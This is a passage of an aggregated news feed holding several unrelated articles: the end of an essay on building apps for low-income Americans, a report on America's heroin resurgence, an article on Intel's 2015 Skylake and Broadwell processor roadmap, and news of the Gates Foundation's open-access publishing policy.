It also became clear that inequality isn’t purely about income. It’s about information and status and opportunity. If you look at the dollar amount, my own income as a freelance writer probably wasn’t much higher than some of my interviewees, but I still had resources like educational credentials and social capital which many of them lacked. One of the reasons that graduation rates among low-income first generation college students hover at around 10% is that they don’t have the “college knowledge” taken for granted by their peers.

Living on a low income translates into other forms of scarcity: of power, information, respect, opportunity, time, health, security, and even of sleep. Our job was to build a piece of technology which could increase our users’ stock of at least one of those resources.

Your Users Won’t Trust You

A few years ago I interviewed a Mexican impact investor named Álvaro Rodríguez Arregui. He explained that impact investors need to be very clear about their motives. “Do you want to do good, or do you want to feel good?” he said. “It’s much easier to feel good by giving away meals to starving kids in Sudan, but you are not going to solve any systemic problem in the world by doing that. This is business, and business is messy and you have to make hard decisions.”

I often didn’t feel good. Sometimes that was because I had to make hard decisions, sometimes because people didn’t understand why we were building mobile tech for domestic workers. All the teams at Significance Labs worked for significantly below market rates. They left jobs, or in my case, even countries. That makes it all the more unsettling when your potential users misunderstand or mistrust you. They have good reasons.

When doing nonprofit or volunteer work it’s all too easy to congratulate yourself for taking on the work at all.

My team worked closely with housecleaners to build Neatstreak. We assembled a panel of "superusers" who tested multiple versions and suggested features we implemented. Cleaners were often delighted just to have someone ask them about their work. People rarely do.

Nevertheless we often had trouble persuading housecleaners and other domestic workers to come to interviews, even though we paid $25 per hour, which was higher than their regular hourly rate. They didn’t know us and it looked too good to be true. Low-income Americans are often the targets of scams which advertise fake education credentials or applications for government benefits.

In the last week of the program one of Neatstreak’s superusers mailed me to say that he felt slighted. “I'm starting to feel like when corporate America uses the little guy for ideas and then forgets about them,” he said. “I was excited and ready to be hands on but instead feel used for my ideas." During a user testing session with a group of Spanish-speaking cleaners, one of the testers gave a speech to the others about how we were a company (Significance Labs is a nonprofit) trying to take advantage of them. When building for low-income users you have to work harder to win their trust and to demonstrate your product’s value.

There Isn’t Always A Technical Solution

Technologists are problem solvers. It’s tempting to either jump in too quickly with a technical solution to an intractable systemic or human problem or to be discouraged by its difficulty. One of my first interviews was with a 21-year-old father of two, Angel. Angel was in foster care before he turned 1 and had been in trouble with the law as a teenager. What he really needed was a steady job which would provide him with an income for his family. No mobile app I could build in three months was going to deliver that.

Another issue was impact versus scale. Should we try to solve a smaller problem for a large number of people or have a bigger impact on a smaller group? Angel had attended Green City Force (GCF), an impressive program in Brooklyn where low-income young people do six months of national service related to the environment and are prepared for sustainable careers. GCF had a huge impact on the graduates we met but this kind of “high-touch” program is not where technology excels. Our best bet might be to create a little more breathing space for a large number of people.

My colleague Jimmy Chen, for example, built a mobile app called EasyFoodStamps to do the first stage of the application for food stamps, saving people hours of standing in queues at the food stamp office. When you lose a day's work or have to get a babysitter to watch your kids in order to apply, that really makes a difference.

Furnishing a naive technical fix is the software equivalent of building a well in a developing country which the locals have neither the motivation nor the skill to maintain. You have to understand the whole context. For example, housecleaners prefer to be paid in cash (so mobile payments were out), mainly use text messaging, and sometimes don’t want to reveal professional information online, especially if they were undocumented.

The U.S. has a serious inequality problem. The top 0.1% of Americans own more than the bottom 90%. Technology in many cases has made that inequality worse by eliminating jobs or replacing them with more insecure ones. Disruption is all very well when you are one of the beneficiaries. The tech business has a moral obligation to see what it can do to help.

But I am also convinced that there are sustainable, if not wildly profitable, businesses to be built on providing valuable services to low-income Americans. At Significance labs, essentially we made bottom-of-the-pyramid products for the developed world. Nearly one in four New Yorkers reply on food stamps and 40,000 more apply every week. Multiple companies chase their dollars outside the food stamp office. We estimated that housecleaners work in 20 million homes in the U.S. These are big numbers.

One of impact investor Rodríguez Arregui's investments in Mexico is Finestrella, a successful startup which developed a set of algorithms to assess the creditworthiness of people who don’t have an official employment history, bank account, or credit rating, in order to offer them a mobile phone plan which costs much less than pre-paid. Two Silicon Valley VC funds with no impact investing mandate, Storm Ventures and Bay Partners, have also invested in Finestrella.

Maybe the best long-term solution is to train a new generation of developers and designers from a low-income background to build their own solutions, but that's easier said than done. People on low incomes already lead a precarious life juggling multiple, low-paying, no-benefits jobs or government support. The last thing they want is more risk of the kind that is involved in launching a startup.

On the other hand, it's striking that all six Significance Labs Fellows are zero or first-generation immigrants. Jimmy was born in China. Margo grew up in Ghana. They went on to Ivy league schools and jobs in companies like Facebook and LinkedIn but their families know what it was like to live a very different life.

Many of the housecleaners I met were already entrepreneurs. Our office cleaner at Significance Labs, Jason, employed five or six people in his cleaning business while also holding down another full-time job. The best thing about my time at Significance Labs was meeting incredible people like Jason and Angel. The most fun I had last summer was sitting in a room chatting to housecleaners.

Drug addiction: The great American relapse

25 November 2014 - 8:00am

PICTURE a heroin addict. “A bum sitting under a bridge with a needle in his arm, robbing houses to feed his addiction,” is what many people might imagine, believes Cynthia Scudo. That image may have been halfway accurate when heroin first ravaged America’s inner cities in the 1960s and 1970s. But Ms Scudo, a smartly dressed young grandmother from a middle-class Denver suburb, knows that these days it is not always like that. Until not so long ago, she was a heroin addict herself.

The face of heroin use in America has changed utterly. Forty or fifty years ago heroin addicts were overwhelmingly male, disproportionately black, and very young (the average age of first use was 16). Most came from poor inner-city neighbourhoods. These days, the average user looks more like Ms Scudo. More than half are women, and 90% are white. The drug has crept into the suburbs and the middle classes. And although users are still mainly young, the age of initiation has risen: most first-timers are in their mid-20s, according to a study led by Theodore Cicero of Washington University in St Louis.

The spread of heroin to a new market of relatively affluent, suburban whites has allowed the drug to make a comeback, after decades of decline. Over the past six years the number of annual users has almost doubled, from 370,000 in 2007 to 680,000 in 2013. Heroin is still rare compared with most other drugs: cannabis, America’s favourite (still mostly illegal) high, has nearly 50 times as many users, for instance. But heroin’s resurgence means that, by some measures, it is more popular than crack cocaine, the bogeyman of the 1980s and 1990s. Its increased popularity in America contrasts strongly with Europe, where the number of users has fallen by a third in the past decade. What explains America’srelapse?

A shot in the arm

Like many of America’s new generation of users, Ms Scudo never intended to take up the drug. Her addiction began in 2000 when, after a hip injury, a doctor prescribed her “anything and everything” to relieve the pain. This included a high dose of OxyContin, a popular brand of opioid pill. Her prescription was later reduced, but she was already hooked. On the black market OxyContin pills cost $80 each, more than she could afford to cover her six-a-day habit; so she began selling her pills and using the proceeds to buy cheaper heroin. As if from nowhere, Ms Scudo had become a heroin addict.

Thousands more have gone down this path. The 1990s saw a big increase in prescriptions of opioids for chronic pain. In some states the number of opioid prescriptions written each year now exceeds the number of people. That oversupply feeds the black market: last year 11m Americans used illicitly-acquired prescription painkillers, more than the number who used cocaine, ecstasy, methamphetamine and LSD combined. People who would never dream of injecting heroin seem to assume that opioids in packets are safe.

But they aren’t. In 2012 prescription painkillers accounted for 16,000 deaths—nearly four out of every ten fatal drug overdoses in America. As the toll grew, some states tightened up the law. In many places doctors must now check databases to make sure the patient has not already been prescribed painkillers by another clinic. Prescriptions have been cut down to as little as a single pill, to reduce the supply of unfinished packets. “Pill mills”, clinics that churned out prescriptions with no questions asked, have been shut down. And drug manufacturers have made their medicines harder to abuse: the latest OxyContin pills, when crushed, turn into a gloop that cannot easily be snorted or dissolved for injection.

These measures have had some impact: rates of prescription-drug abuse and of overdose have dipped a little in the past two years. But as the supply of pain pills has dropped, and their black-market price has risen, many addicts have turned to heroin to satisfy their craving more cheaply. “We saw it coming at us at 90mph, like a freight train,” says Meghan Ralston of the Drug Policy Alliance, a drug-reform pressure group. The number of deaths from heroin overdoses doubled between 2010 and 2012, and many of those attending addiction clinics are college-age, middle-class types who started on prescription pills.

The Mexican wave

Just as the demand side of America’s heroin market was heating up, so too was supply. Though Afghanistan accounts for 80% of global opium production, America gets most of its heroin from Mexico. Historically that has checked consumption, since Mexico has long been a relatively small producer of opium poppies.

In the past few years the Mexicans have upped their game. One of the many unintended consequences of Mexico’s war on organised crime in urban hotspots, such as Ciudad Juárez, was that the army was diverted from poppy eradication in the countryside. Farmers in the Sierra Madre made the most of this: by 2009 cultivation was ten times higher than in 2000. Although production has fallen back in the past few years, Mexico is now the world’s third-biggest producer of opium, after Afghanistan and Myanmar.

Policy changes in America have given Mexico’s narco-farmers further incentives to focus on opium. Until not so long ago, Mexican traffickers made a lot of their money from cannabis. But these days most of the cannabis in America is home-grown. Nearly half the states have legalised medical marijuana, and four have voted to legalise it outright. Exporting pot to the United States is now like taking tequila to Mexico. Facing a glut in the cannabis market, Mexican farmers have turned to poppies.

America’s police have seen the impact. Seizures of heroin at the border with Mexico have risen from 560kg (1,230lb) in 2008 to about 2,100kg last year. And the smugglers have become bolder. “Three or four years ago, 5lb was big. Now sometimes we’re finding 20lb,” says Kevin Merrill, the assistant special agent in charge of the Drug Enforcement Administration on the outskirts of Denver.

The low transport costs faced by Mexican traffickers, who need only drive from Sinaloa to the border, mean that their heroin is far cheaper than the Colombian or Asian sort. A gram of pure heroin in America now costs about $400, less than half the price, in real terms, that it cost in the 1980s. And whereas much of the heroin in the past was of the “black tar” variety, which is usually injected, there is a trend towards brown heroin, which lends itself better to snorting and smoking. That matters to novice heroin users, who may be skittish about needles. “I somehow thought that if I didn’t inject it, I wasn’t a heroin addict,” says Ms Scudo, who smoked it instead.

As fewer people are introduced to prescription opioids, the number who are vulnerable to heroin addiction will also eventually fall. “Things are getting a little better,” says Patrick Fehling, a psychiatrist at the CeDAR rehabilitation clinic in Denver, where Ms Scudo eventually kicked her habit. Yet services like these are scarce, particularly for the poor: a month at CeDAR costs $27,000. Those with no money or insurance are more likely to be put on methadone, a heroin substitute which sates cravings but does not stop them.

Now that heroin addiction is no longer a disease only of the urban poor, however, attitudes are changing. The Obama administration’s latest national drug strategy, published in July, criticised “the misconception that a substance-use disorder is a personal moral failing rather than a brain disease”. It called for greater access to naloxone, an antidote that can reverse the effects of heroin overdose, and backed state-level “good Samaritan” laws, which give immunity to people who call 911 to help someone who is overdosing. Needle-exchange services, which have cut rates of hepatitis and HIV among drug users in Europe, are expanding. These programmes are easier for politicians to sell now that heroin addiction is no longer just the “bum under the bridge”.

Intel’s 6th Generation Skylake Processors Scheduled for 2H 2015

25 November 2014 - 8:00am

Intel has yet again updated its processor roadmap showcasing that they are on schedule with their upcoming products such as Skylake, Broadwell, Braswell and the new mobility cores. There have been widespread rumors that Intel would be delaying their Skylake processors to 2016 but a second roadmap update debunks the false claims showing that 2015 would be a major update in regards to processor architecture and technology with the simultaneous launch of a Tick (Broadwell) and Tock (Skylake).

Image Credits: Zdnet

As we know, Intel has already launched their first iteration of their chips based on the Broadwell architecture codenamed “Core M”. We did a fairly detailed analysis of Core M (Broadwell-Y) a few months ago and from the looks of it, Core M is based on a true 14nm node from Intel and the same node would be carried over to the performance oriented chips arriving in Spring of 2015. Intel’s Core M will be adopted by performance tablets and mainstream notebooks in this quarter with reviews already hitting the web while the performance SKUs will be coming in Spring of 2015 and featured in high performance notebooks and All-In-One PCs.

In all honesty, Broadwell is just a node shrink with a average IPC improvement around 5%, +/- a few percentage however Broadwell does come with some power enhancements and those are fairly great for the notebook to mobility side of things featuring TDPs of 15/28W on the BGA chips while Braswell on the other hand is based on the 14nm Airmont architecture will be a SOC / BGA chip for J-Series Processors and come in >10W TDPs. It will be adopted in Celeron and Pentium series SKUs and is a direct competitor for AMD’s AM1 series parts given the power and pricing range. Braswell will be featuring the 8th Generation graphics chip that is going to be featured on modern Broadwell processors along with DirectX 11 API and Windows + Android OS support.

So enough with the mobility parts, we will come back to them in a bit after detailing the desktop parts. Usually, server and desktop parts are considered the meat of any given CPU architecture showcasing their real potential and in 2015, Intel will launch two desktop parts, Broadwell-K and Skylake-S. We have given you details on these parts several times before but let’s do a recap. A recent roadmap update which was showcased two weeks ago revealed Broadwell-K (Unlocked) to be arriving in the 1H of 2015. Broadwell-K will be compatible with the LGA 1150 socketed motherboards featuring the 9-Series chipsets (Z97/H97). Broadwell-K is similar to Devil’s Canyon which were the enthusiast Haswell parts built for overclockers. You can call these Devil’s Canyon II (not an official name) and will be part of Intel’s 5th Generation Core family featuring the Core i5-5000 and Core i7-5000 series processors.

Intel 5th Generation Broadwell – Core i7-5000 and Core i5-5000 Series Processors

The desktop chips have been confirmed to feature Intel’s 8th generation Iris Pro graphics chips. Intel Iris Pro graphics chips features double the execution units of the HD 4600 graphics chip (40 vs 20) and comes with its own 128 MB of on-package eDRAM codenamed ‘CrystalWell’. This super fast LLC helps deliver the Iris Pro graphics chip with 25.6GB/s + 50GB/s eDRAM (bidirectional) which fulfills its bandwidth requirement. The Crystalwell eDRAM is located on a separate package on the CPU die. On 8th generation Broadwell, the CPU is going to feature a total of 48 execution units with support for DirectX 12 API, VP8 Codec, 2xMSAA Support, Improved Tessellation and Low CPU Overhead. We can also confirm that just like Haswell, Broadwell will have a Voltage Regulator on chip. There will also be a power controller on chip. This will allow as much as C10 level of low power state computing. the U and H variants will both have a Extreme Tuning Utility which will allow easy overclocking of both the CPU and GPU. In such a case, we can obviously expect better performance from the Broadwell line of Core processors.

Intel 6th Generation Skylake – Core i7-6000 and Core i5-6000 Series Processors

The second update on desktop would arrive in 2H of 2015 in the form of Skylake-S. Now Skylake is also based on a 14nm architecture but its a microarchitecture built from the ground up. The Skylake-S processors which are the mainstream line will be branded as the 6th Generation Core i5-6000 and Core i7-6000 parts. Skylake will feature compatibility with the LGA 1151 socketed motherboards based on the 100-Series (Z170/H170) series Sunrise Point chipset. Now just like Haswell Refresh, these S-Series parts will not feature any unlocked SKUs but will give users an early experience of Intel’s new mainstream platform with DDR4 compatibility which currently exists only on the HEDT X99 chipset platform on the consumer front.

The transition to Z170 chipset will not be a massive upgrade and would be similar to what the Z97 was to Z87 with a little added features such as more PCI-e lanes, Super Speed USB and up to 10 USB ports compared to 6 standard ones found on the current iteration of motherboards. There will be a total of six 100-series chipset SKUs which will include the Z170 (Performance)replacing the Z97, H170 (Mainstream) replacing the H97, H110 (Value) replacing the H81, B150 (Small and medium Business) replacing the B85 and the Q170 plus Q150 chips with Intel vPro / SIPP which will replace the Q87 and Q85. So as you can note,Intel has the entire replacement plan ready which will update the current desktop chipset stack in 2015. Intel is already phasing out their Ivy Bridge-E and Z77/H77/H75/Q75 chipsets in early 2015. This transition won’t eliminate support for Z97 or Z87 in 2015 since there would be a majority of consumers who will still be running Broadwell and Haswell processors since these platforms have spanned a longer shelve-time in the market and will cease to exist along side each other for a couple of years.

The Z170 would be the flagship performance chipset which will support the unlocked K-Series Skylake processors which I don’t believe would be available in early 2015 and launch a bit later. The chipset will feature up to 20 PCIe Gen 3 lanes, 6 SATA Gen 3 ports, 10 USB 3.0 ports and a total of 14 total USB ports (USB 3.0 / USB 2.0), up to 3 SATA Express capable ports, up to 3 Intel RST capable PCI-e storage ports which may include x2 SATA Express or M.2 SSD port with Enhanced SPI and x4/x8/x16 capable Gen 3 PCI-Express support from the processor. Aside from that, we know that the Skylake processors would be compatible with the latest LGA 1151 socketed boards and Z170 chipset which is part of the new 100-Series chipset replacing the 9-Series “Wild Cat” PCH. The second most interesting thing covered is that Skylake processors would have both DDR3 and DDR4 memory controllers so the different SKUs can be configured to use either of the memory type.

Intel Skylake-S and Skylake SKUs Configuration: Edit

WCCFTech.com

Intel 14nm Skylake Configuration Table

Variant SKL-Y (BGA) SKL-U (BGA) SKL-H (BGA) SKL-S (LGA) Cores Configurations 2 2 / 2 4 / 4 4 / 2 / 4 Graphic Configurations GT2 GT2 / GT3e GT2 / GT4e GT2 / GT2 / GT4e eDRAM - 64MB – GT3e 128MB – GT4e 64MB – GT4e Memory LPDDR3 1600Mhz LPDDR3 1600Mhz DDR4 2133Mhz DDR3L/DDR3L-RS 1600Mhz, DDR4 2133Mhz TDP 4W 15-28W 35-45W 35-95W

The TDPs for the Skylake processors were also confirmed last month which further detailed the various core configurations of Skylake SKUs. The desktop variants will have six different variants which will include the flagship 95W Quad Cores with GT2 and GT4e GPU while the lowest 35W TDP variant will feature Dual Cores and GT2 graphics. The H-Series lineup will also include the 95W Quad Core with GT4e graphics chip but that’s the only flagship chip followed by 65W, 55W and 45W Quad Core variants with a mix of GT4e and GT2 graphics. Skylake would also get rid of the FVIR (Fully Integrated Voltage Regulator) which was featured on Haswell generation processors and will continue to be used till Broadwell processors in 1H 2015 after which Intel will abandon the design.

This H-Series doesn’t seem to include a dual core model at all. The U-Series lineup will have TDPs of 25W and 15W with the flagship part featuring Dual Cores and GT3e graphics while the other models consist of GT2 graphics. Last up is the Y-Series Skylake lineup featuring two SKUs, both featuring 4.5W TDP and 2 Cores plus GT2 graphics. The difference between them is not clearly mentioned however we think its related to clock speeds. You can get a better representation of the variants in the following chart:

SKUs x86 Cores Graphics TDP Skylake DT 4 GT4e 95W Skylake DT 4 GT2 95W Skylake DT 4 GT2 65W Skylake DT 2 GT2 65W Skylake DT 2 GT2 35W Skylake DT 4 GT2 35W H-Series 4 GT43 95W H-Series 4 GT4e 65W H-Series 4 GT4e 55W H-Series 4 GT4e 45W H-Series 4 GT2 65W H-Series 4 GT2 55W H-Series 4 GT2 45W U-Series 2 GT3e 25W U-Series 2 GT3e 15W U-Series 2 GT2 25W U-Series 2 GT2 15W Y-Series A 2 GT2 4.5W Y-Series B 2 GT2 4.5W

We will also get several new Wireless technology on the 100-Series chipset such as Snowfield Peak (WiFi + Blue-tooth) replacing Wilkins Peak, Douglas Peak (WiGig+ WiFi + BT) replacing Stone Peak and Maple Peak and the Pine Peak plus WWAN LTE chips (XMM 726x) replacing the WWAN XMM7160) for wireless connectivity.  Intel is also introducing the latest Alpine Ridge thunderbolt controller with Skylake pushing speeds of 40Gb/s, double that of last generation. For LAN, Intel will introduce Jacksonville to replace Clarksville. Samples of the Skylake-S CPUs have already been demonstrated by Intel at IDF14 this year and just recently, a Skylake-S ES was pictured with 2.4 GHz base and 2.9 GHz boost clock (TDP 95W). This shows that Skylake-S will be on schedule.

Intel Mainstream Platforms Comparison Chart: Intel Sandy Bridge Platform Intel Ivy Bridge Platform Intel Haswell Platform Intel Broadwell Platform Intel Skylake Platform Intel Cannonlake Platform Processor Architecture Sandy Bridge Ivy Bridge Haswell Broadwell Skylake Cannonlake Processor Process 32nm 22nm 22nm 14nm 14nm 10nm Processors Cores (Max) 4 4 4 4 4 TBA Platform Chipset 6-Series “Cougar Point” 7-Series “Panther Point” 8-Series “Lynx Point” 9-Series “Wild Cat Point” 100-Series “Sunrise Point” 200-Series “Union Point” Platform Socket LGA 1155 LGA 1155 LGA 1150 LGA 1150 LGA 1151 TBA Memory Support DDR3 DDR3 DDR3 DDR3 DDR4 / DDR3 DDR4 Thunderbolt Yes Yes Yes Yes Yes “Alpine Ridge” Yes Platform Desktop LGA Desktop LGA Desktop LGA Desktop LGA Desktop LGA Desktop LGA Launch 2011 2012 2013-2014 2015 2015 2016 Intel Mobility Update With Broxton, SoFIA MID, SoFIA LTE 2

Back to the mobile front, Intel has three updates for 2016 with Broxton (Quad Core SOC based on 14nm Goldmont) which will be featured in performance mobile platforms while the SoFIA MID will go for the mid-tier Quad Core based LTE solutions. The part of 2015 will be updated with Cherry Trail and Moorefield while on the value side, several SoFIA 3G (Dual Core), SoFIA 3G-R (Quad Core), SoFIA LTE (Quad Core w/LTE) will launch in 2015 while 2016 will feature the SoFIA LTE 2 update based on 14nm process.

Share on Facebook

We cater to your constant need to remain up to date on today’s technology. Like us, tweet to us or +1 us, to keep up with our round the clock updates, reviews, guides and more.

Gates Foundation to require immediate free access for journal articles

25 November 2014 - 8:00am

Jocelyn is a staff writer for Science magazine.

Breaking new ground for the open-access movement, the Bill & Melinda Gates Foundation, a major funder of global health research, plans to require that the researchers it funds publish only in immediate open-access journals.

The policy doesn’t kick in until January 2017; until then, grantees can publish in subscription-based journals as long as their paper is freely available within 12 months. But after that, the journal must be open access, meaning papers are free for anyone to read immediately upon publication. Articles must also be published with a license that allows anyone to freely reuse and distribute the material. And the underlying data must be freely available.

The immediate access requirement goes further than policies of other major biomedical research funders in the United States and Europe. Most encourage their researchers to publish in immediate open-access journals, but allow delayed access after an embargo of 6 to 12 months. (Most subscription-based journals, including Science, allow authors to comply with those policies.) The Gates Foundation will also pay the author fees charged by many open-access journals.

“By reinforcing the global health community’s commitment to sharing research data and information, we can accelerate the development of new solutions to tackle infectious diseases, cut maternal and child mortality, and reduce malnutrition in the world’s poorest places,” wrote Trevor Mundel, president of the foundation’s Global Health Division, on the group’s website on 20 November.

The policy is “truly a giant step forward for Open Access policies!!” wrote Heather Joseph, executive director of the open-access advocacy group SPARC in Washington, D.C., in an e-mail to the group’s members.

The Gates Foundation spends about $900 million a year on its global health programs, mostly on research. That results in roughly 1400 research papers a year, 30% of which now appear in open-access journals, according to foundation communications officer Amy Enright.